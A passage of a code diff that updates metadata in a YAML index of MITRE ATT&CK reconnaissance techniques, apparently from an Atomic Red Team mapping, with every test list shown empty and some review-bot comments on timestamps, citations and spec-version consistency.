x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -56241,29 +56928,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -56272,15 +56940,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -56306,7 +56993,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -56324,47 +57011,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56373,19 +57023,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
@@ -56408,7 +57094,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56424,8 +57110,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -56451,7 +57135,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56467,8 +57151,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -56496,7 +57178,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56512,12 +57194,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56526,16 +57206,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56548,8 +57228,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56560,52 +57240,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
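Review bot: the T1597 description drops `(Citation: D3Secutrity CTI Feeds)` and the matching external reference (the misspelled `D3Secutrity` entry) is removed in the same hunk, so no dangling citation remains here; still worth grepping the rest of the file for other uses of that `source_name` before merging. Also note that `revoked: false` and `x_mitre_deprecated: false` are only being added to objects that this regeneration touches; if the index loader treats an absent key as false this is harmless, otherwise untouched objects will be inconsistent with these.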
@@ -56627,7 +57305,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
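Review bot: the `modified` timestamp here moves backwards (2022-04-25 to 2021-04-15), and the old value `2022-04-25T14:00:00.188Z` recurs on many objects in this patch with the same `14:00:00.188Z` fraction, which looks like a bulk-assigned value rather than a real edit time. Reverting to the upstream timestamp is presumably correct, but anything that sorts or diffs techniques by `modified` will now see these as older than before; a note in the PR description on where the new values come from would help.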
@@ -56643,8 +57321,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
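Review bot: this hunk removes `x_mitre_attack_spec_version` entirely from T1592.003, whereas other objects in this patch either keep it at `2.1.0` or get bumped to `3.2.0`. Dropping `spec_version: '2.1'` is consistent across the file, but losing `x_mitre_attack_spec_version` only on some objects looks accidental; confirm the regenerated source really omits it for these techniques, or have the generator fill in a default so consumers can rely on the field being present.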
@@ -56670,7 +57346,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56688,8 +57364,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -56711,7 +57385,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56727,12 +57401,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -56742,17 +57414,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
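Review bot: the rewritten T1589.001 description introduces three new citation keys (`Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023`, `Bleeping Computer Stealer Logs 2023`); each needs a matching `source_name` under `external_references`, which the later hunks of this patch do add. Separately, the block `(Citation: Register Deloitte)` through `(Citation: CNET Leaks)` now follows the ScanBox sentence instead of the leaks sentence it originally supported; if this mirrors the upstream ATT&CK text it should stay, but check it is not a merge artifact.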
@@ -56764,6 +57439,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56774,7 +57450,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -56784,6 +57460,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56796,6 +57476,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56818,6 +57502,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56825,9 +57513,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56886,7 +57573,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56906,7 +57593,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -56928,7 +57614,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56944,12 +57630,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -57018,7 +57702,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
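Review bot: replacing the dead cyber.gov.au PDF link with a dated web.archive.org snapshot is the right fix, since the snapshot URL still embeds the original address; keeping `Retrieved October 19, 2020` is also correct because it records when the source was originally consulted, not when the link was repaired.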
@@ -57066,31 +57750,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
